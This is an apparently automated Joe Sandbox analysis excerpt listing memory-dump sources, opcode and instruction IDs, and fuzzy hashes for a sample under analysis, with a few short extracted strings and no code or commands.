                                • Source File: 0000002C.00000002.2475129174.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_44_2_7ff848e80000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID: 5Y_H
                                • API String ID: 0-3237497481
                                • Opcode ID: c8ffc68d88e618bb9bd493aeab084cdc00293c7105ab1ef8c7895a6088db3a6b
                                • Instruction ID: e295dafea358cf6be0cb41fe3754ce1d14e09928c1b04977fc8d60929d186de5
                                • Opcode Fuzzy Hash: c8ffc68d88e618bb9bd493aeab084cdc00293c7105ab1ef8c7895a6088db3a6b
                                • Instruction Fuzzy Hash: C091DE71D1CA8D8FE78AEB2888693E97FE1FB56350F4401BAC049D73D2EB7918148B15
                                Memory Dump Source
                                • Source File: 0000002C.00000002.2475129174.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_44_2_7ff848e80000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1d95b396a24920f965409c69aebb5e07a84aa49c68554acf22f655b63f0015d5
                                • Instruction ID: a8eb4ac7bccbdd56f3484c3f05bbb5fc44d42a410736aaad1995a5139788867f
                                • Opcode Fuzzy Hash: 1d95b396a24920f965409c69aebb5e07a84aa49c68554acf22f655b63f0015d5
                                • Instruction Fuzzy Hash: 4F51B171D18A9D8EE399EF2888A97F97FE0FB56351F4012BAC009D37D1EB7514118B14
                                Memory Dump Source
                                • Source File: 0000002C.00000002.2475129174.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_44_2_7ff848e80000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 323b7e45a8aac7bf7cea1d31a7eba6e259066ad1cdc8d476df9ffb0a687d89ed
                                • Instruction ID: f3d52bd67096cabd63d28afac80bb092e1e7fc990ae3d7eedf2212890a1a5b89
                                • Opcode Fuzzy Hash: 323b7e45a8aac7bf7cea1d31a7eba6e259066ad1cdc8d476df9ffb0a687d89ed
                                • Instruction Fuzzy Hash: 1221EA3170CC194FD768EA1CE889DB973D1FF9932170501BAE58EC7125E921EC8287C5
                                Memory Dump Source
                                • Source File: 0000002C.00000002.2475129174.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_44_2_7ff848e80000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8e133b0973b8042dd42c2dd12b6fbd54ceb17b184d5dcb038cb6d9ec2718aba8
                                • Instruction ID: ae7b01c5cc58f3f045bb679420249445e3928d864ce28a1faaf30906b1ff6ec3
                                • Opcode Fuzzy Hash: 8e133b0973b8042dd42c2dd12b6fbd54ceb17b184d5dcb038cb6d9ec2718aba8
                                • Instruction Fuzzy Hash: 46210620B1CD595FE788B72C545A7B973D6EF99351F5000BAE80DC33E7DE28AC418684
                                Memory Dump Source
                                • Source File: 0000002C.00000002.2475129174.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_44_2_7ff848e80000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c09cb4d9254496e6c467928670a31dec2b9a882ebfbde9974ccdf6eab5381dd4
                                • Instruction ID: 1214eb40f3f9d7c34931d5dceef699195bce9b176f0469943c994949057e9a37
                                • Opcode Fuzzy Hash: c09cb4d9254496e6c467928670a31dec2b9a882ebfbde9974ccdf6eab5381dd4
                                • Instruction Fuzzy Hash: 8921FC36A0D68DAFE716BB7898110EC7B60FF42361F5442B3D048CB183DB382546CBA5
                                Memory Dump Source
                                • Source File: 0000002C.00000002.2475129174.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_44_2_7ff848e80000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bc4e37843ed38148d2f6a542dc3a4f9fc9f4492120359c64c430d6bf4d260611
                                • Instruction ID: 41dd62a219195f639a4beb3ab434487037677cb0c4e1bf366816a5d90f271fdf
                                • Opcode Fuzzy Hash: bc4e37843ed38148d2f6a542dc3a4f9fc9f4492120359c64c430d6bf4d260611
                                • Instruction Fuzzy Hash: 7801FC31F0D91E0FD568F01D944A93973C2E7C6A70B551279D84FC3245DE20AC5342C4
                                Memory Dump Source
                                • Source File: 0000002C.00000002.2475129174.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_44_2_7ff848e80000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Strings
                                Memory Dump Source
                                • Source File: 0000002C.00000002.2475129174.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_44_2_7ff848e80000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID: c9$!k9$"s9$#{9
                                • API String ID: 0-1692736845